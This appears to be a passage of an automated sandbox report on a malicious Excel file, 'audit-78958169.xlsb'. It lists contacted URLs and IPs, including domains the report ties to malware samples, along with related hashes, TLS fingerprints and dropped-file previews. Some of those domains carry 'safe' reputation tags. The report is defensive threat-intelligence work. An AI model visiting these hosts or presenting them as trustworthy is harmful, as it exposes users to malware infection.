                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.tripadvisor.com/img/cdsi/img2/branding/150_logo-11900-2.pngfasol[1].htm.0.drfalse
                                              high
                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                high
                                                http://weather.service.msn.com/data.aspx04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                  high
                                                  https://www.dreamhimalayan.com/island-peak-climbing.htmlfasol[1].htm.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                    high
                                                    https://www.dreamhimalayan.com/everest-kalapathar-trek.htmlfasol[1].htm.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://embed.tawk.to/5b1e29123604f81d726bebcb/defaultfasol[1].htm.0.drfalse
                                                      high
                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                        high
                                                        https://www.dreamhimalayan.com/pagegallery/5twit.pngfasol[1].htm.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://wus2.contentsync.04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://thetravelista.net/2018/04/25/2-week-nepal-itinerary/fasol[1].htm.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://clients.config.office.net/user/v1.0/ios04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                          high
                                                          https://o365auditrealtimeingestion.manage.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                            high
                                                            https://outlook.office365.com/api/v1.0/me/Activities04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                              high
                                                              https://clients.config.office.net/user/v1.0/android/policies04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                high
                                                                https://entitlement.diagnostics.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                  high
                                                                  https://www.dreamhimalayan.com/blog/8-things-to-do-in-thamel/fasol[1].htm.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                    high
                                                                    https://outlook.office.com/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                      high
                                                                      https://www.dreamhimalayan.com/images/logo-01.pngfasol[1].htm.0.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://storage.live.com/clientlogs/uploadlocation04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                        high
                                                                        https://www.dreamhimalayan.com/review.htmlfasol[1].htm.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.dreamhimalayan.com/guides-porters-hire.htmlfasol[1].htm.0.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://graph.windows.net/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                          high
                                                                          https://devnull.onenote.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                            high
                                                                            https://messaging.office.com/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                              high
                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                high
                                                                                https://skyapi.live.net/Activity/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://api.cortana.ai04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.dreamhimalayan.com/pagegallery/100ntb.pngfasol[1].htm.0.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                  high
                                                                                  https://staging.cortana.ai04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://onedrive.live.com/embed?04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                    high
                                                                                    https://augloop.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                      high
                                                                                      https://www.dreamhimalayan.com/terms-and-conditions.htmlfasol[1].htm.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.dreamhimalayan.com/annapurna-region.htmlfasol[1].htm.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.dreamhimalayan.com/pagegallery/48visa.jpgfasol[1].htm.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.dreamhimalayan.com/classic-nepal-tour.htmlfasol[1].htm.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.dreamhimalayan.com/team.htmlfasol[1].htm.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://api.diagnostics.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                        high
                                                                                        https://www.dreamhimalayan.com/pagegallery/22trekking-spot.jpgfasol[1].htm.0.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://store.office.de/addinstemplate04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                          high
                                                                                          https://wus2.pagecontentsync.04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://api.powerbi.com/v1.0/myorg/datasets04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                            high
                                                                                            https://www.dreamhimalayan.com/nepal.htmlfasol[1].htm.0.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.dreamhimalayan.com/pagegallery/37travelista.jpgfasol[1].htm.0.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cortana.ai/api04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://www.dreamhimalayan.com/kathmandu-day-tour.htmlfasol[1].htm.0.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.dreamhimalayan.com/payment-process.htmlfasol[1].htm.0.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.dreamhimalayan.com/nepal-family-tour.htmlfasol[1].htm.0.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://api.diagnosticssdf.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                              high
                                                                                              https://login.microsoftonline.com/04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                high
                                                                                                https://www.dreamhimalayan.com/pagegallery/49gov.pngfasol[1].htm.0.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                  high
                                                                                                  https://api.addins.omex.office.net/appinfo/query04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/tenantassociationkey04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                      high
                                                                                                      http://www.dreamhimalayan.com/team.htmlfasol[1].htm.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://powerlift.acompli.net04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://xenatechnepal.comfasol[1].htm.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cortana.ai04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                        high
                                                                                                        https://cloudfiles.onenote.com/upload.aspx04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnosticssdf.office.com04DD18EA-EB39-43EF-8561-8310CF9A47D6.0.drfalse
                                                                                                            high
                                                                                                            https://www.dreamhimalayan.com/slider/budget-everest-base-camp-trek47.jpgfasol[1].htm.0.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown

                                                                                                            Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            192.185.48.167
                                                                                                            forfacks.comUnited States
                                                                                                            46606UNIFIEDLAYER-AS-1USfalse
                                                                                                            192.185.113.120
                                                                                                            dreamhimalayan.comUnited States
                                                                                                            46606UNIFIEDLAYER-AS-1USfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                            Analysis ID:432395
                                                                                                            Start date:10.06.2021
                                                                                                            Start time:09:10:55
                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                            Overall analysis duration:0h 4m 57s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Sample file name:audit-78958169.xlsb
                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                            Number of analysed new started processes analysed:19
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • HDC enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Detection:MAL
                                                                                                            Classification:mal76.expl.evad.winXLSB@5/12@2/2
                                                                                                            EGA Information:Failed
                                                                                                            HDC Information:Failed
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 0
                                                                                                            • Number of non-executed functions: 0
                                                                                                            Cookbook Comments:
                                                                                                            • Adjust boot time
                                                                                                            • Enable AMSI
                                                                                                            • Found application associated with file extension: .xlsb
                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                            • Attach to Office via COM
                                                                                                            • Scroll down
                                                                                                            • Close Viewer
                                                                                                            Warnings:
                                                                                                            Show All
                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.43.193.48, 104.42.151.234, 52.109.88.177, 52.109.76.33, 52.109.88.39, 20.50.102.62, 20.72.88.19, 20.54.26.129, 20.75.105.140, 8.241.79.126, 8.238.85.126, 8.241.89.254, 67.26.139.254, 8.241.89.126, 20.82.210.154, 92.122.213.194, 92.122.213.247
                                                                                                            • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            No simulations

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            192.185.48.167viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                              DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                  192.185.113.120ForeignRemittance_20210219_USD.xlsxGet hashmaliciousBrowse
                                                                                                                  • www.guepard-marine.com/ivay/?PbvpO8=7c4TMZ8HJw/eFJUVC4Rd5gN+5dnR2WOvXzuZPR1ukaHcCIIPr6KkFYNadeo0+7aaqJva+Q==&-Zp=fxoDxR_8sz1ds
                                                                                                                  c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                                                                                  • www.guepard-marine.com/ivay/?oPnpM4=7c4TMZ8CJ3/aFZYZA4Rd5gN+5dnR2WOvXz2JTSpvg6HdC5kJsqboTc1Ye7Ei6rephKyq&Lh0l=ZTdp62D8T

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  dreamhimalayan.comviVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  forfacks.comviVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167

                                                                                                                  ASN

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  UNIFIEDLAYER-AS-1USresearch-1315978726.xlsbGet hashmaliciousBrowse
                                                                                                                  • 216.172.184.23
                                                                                                                  ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                                                                  • 108.167.142.232
                                                                                                                  research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                  • 216.172.184.23
                                                                                                                  research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                  • 216.172.184.23
                                                                                                                  viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                  • 108.167.156.223
                                                                                                                  analysis-1593377733.xlsbGet hashmaliciousBrowse
                                                                                                                  • 108.167.156.223
                                                                                                                  research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  OM PHOENIX TRADERS.exeGet hashmaliciousBrowse
                                                                                                                  • 192.254.185.244
                                                                                                                  research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  research-76934760.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  research-1960540844.xlsxGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  fm8m5vuj2w.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.26.241
                                                                                                                  research-1110827633.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  swift_08_06_21.exeGet hashmaliciousBrowse
                                                                                                                  • 162.241.61.204
                                                                                                                  INVOICES,PDF.exeGet hashmaliciousBrowse
                                                                                                                  • 192.254.224.94
                                                                                                                  Outstanding_Payments.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.129.69
                                                                                                                  xTnb7uPpSb.xlsGet hashmaliciousBrowse
                                                                                                                  • 192.185.107.121
                                                                                                                  UNIFIEDLAYER-AS-1USresearch-1315978726.xlsbGet hashmaliciousBrowse
                                                                                                                  • 216.172.184.23
                                                                                                                  ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                                                                  • 108.167.142.232
                                                                                                                  research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                  • 216.172.184.23
                                                                                                                  research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                  • 216.172.184.23
                                                                                                                  viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.113.120
                                                                                                                  analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                  • 108.167.156.223
                                                                                                                  analysis-1593377733.xlsbGet hashmaliciousBrowse
                                                                                                                  • 108.167.156.223
                                                                                                                  research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  OM PHOENIX TRADERS.exeGet hashmaliciousBrowse
                                                                                                                  • 192.254.185.244
                                                                                                                  research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  research-76934760.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  research-1960540844.xlsxGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  fm8m5vuj2w.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.26.241
                                                                                                                  research-1110827633.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.33.8
                                                                                                                  swift_08_06_21.exeGet hashmaliciousBrowse
                                                                                                                  • 162.241.61.204
                                                                                                                  INVOICES,PDF.exeGet hashmaliciousBrowse
                                                                                                                  • 192.254.224.94
                                                                                                                  Outstanding_Payments.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.129.69
                                                                                                                  xTnb7uPpSb.xlsGet hashmaliciousBrowse
                                                                                                                  • 192.185.107.121

                                                                                                                  JA3 Fingerprints

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  37f463bf4616ecd445d4a1937da06e19Docc.htmlGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  askinstall39.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  Lista e porosive.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  askinstall39.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.46459351.411.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  Yl6482CO6U.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  ZmZvKByoew.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  V2GC02n03l.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  research-1315978726.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  Sleek_Free.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  pT2QK2iM34.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  #Ud83d#Udcde_#U25b6#Ufe0f.htmGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  wzdu53.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  LVh23zF9x9.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  5t5CHsBPkq.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  8KfPvyojv5.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120
                                                                                                                  pd5S1Fiscq.exeGet hashmaliciousBrowse
                                                                                                                  • 192.185.48.167
                                                                                                                  • 192.185.113.120

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\04DD18EA-EB39-43EF-8561-8310CF9A47D6
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):134922
                                                                                                                  Entropy (8bit):5.369105203882803
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:VcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:hEQ9DQW+ziXOe
                                                                                                                  MD5:1B0A0FEF9868ACFB7DA3233679C67C68
                                                                                                                  SHA1:D5E6771AF2A017AD54B476791B83FA4C3AADA67A
                                                                                                                  SHA-256:F15B8E94F6C610AB2734669C12880E0201A2BBE6C5A3B830AAE6487AAF93ABA4
                                                                                                                  SHA-512:7B184C143982F0BF6E62C7F937FB4B33ACF72D909ABF36516FCB45E43341F188CD74D62AB802E9C7C1D0BE3F7D66A2DD958FDF16AB73DED5B71A37357B85140D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-10T07:11:43">.. Build: 16.0.14209.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2F8551B.png
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 490 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):18547
                                                                                                                  Entropy (8bit):7.9850486438978985
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70
                                                                                                                  MD5:ED31C7053D581EDC4C98D222CE02EDEF
                                                                                                                  SHA1:6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD
                                                                                                                  SHA-256:0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534
                                                                                                                  SHA-512:929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: .PNG........IHDR.............l{......sRGB.........pHYs..........+....H.IDATx^...U............"x....U...."...Tc.{...M1M..In....TATb4F,`oD..Q..3......g.3..Lr.D....a8....~.z....Z...yyF..9...:.H.Q2..)/L.....Q.}....(J..,...w2>R.$..G2..m>..|...0.M.g.Xnjj...P.v..x....S......B..p.=.Lz.^..Wi..2U.V'.a..*DE.'..rT.z....#.;..]....[?.C...o.m`]..m][;.:<..]F.9..u..Q]c.Ue.9....(.F.Z.~s..Q:..B...)..LZ.TTo..P.gc.l.'.X.}..H....Q.h|....L..rcd.2dN..co..5.....w.U.4..}........{.Q.....D2.J.z~..:Y3,.H..(#.J.Q......N.._7....w.....].2w.6...._....u.......9-.7.f9...E9...p.A..f....=....Bqu....A.u.JG>b"...%..0..W.H=...G#.DR.....P.|FD).NJ....)>.;...M...T*.dW..t:[.xT..M.|S...O..."M.4u7.uS...]4..R.vK....*).ZK.. J.=.9C.].kr..ES..6..f.(.....N':..t..^.S....kn[s.#..(.....m.....~....6>....:u.J.mO.....%D...Q...6%....!......H.....v..^%....$.._..V........[o5.H8......n.~M.z.RL.0p:.iC.k.1..$...............3[....mS5..........E...2.&...k]...A.....K.8...5..O.@7.[-.F4*7...i....in...y....A
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\566DD3D4.png
                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):848
                                                                                                                  Entropy (8bit):7.595467031611744
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                  MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                  SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                  SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                  SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
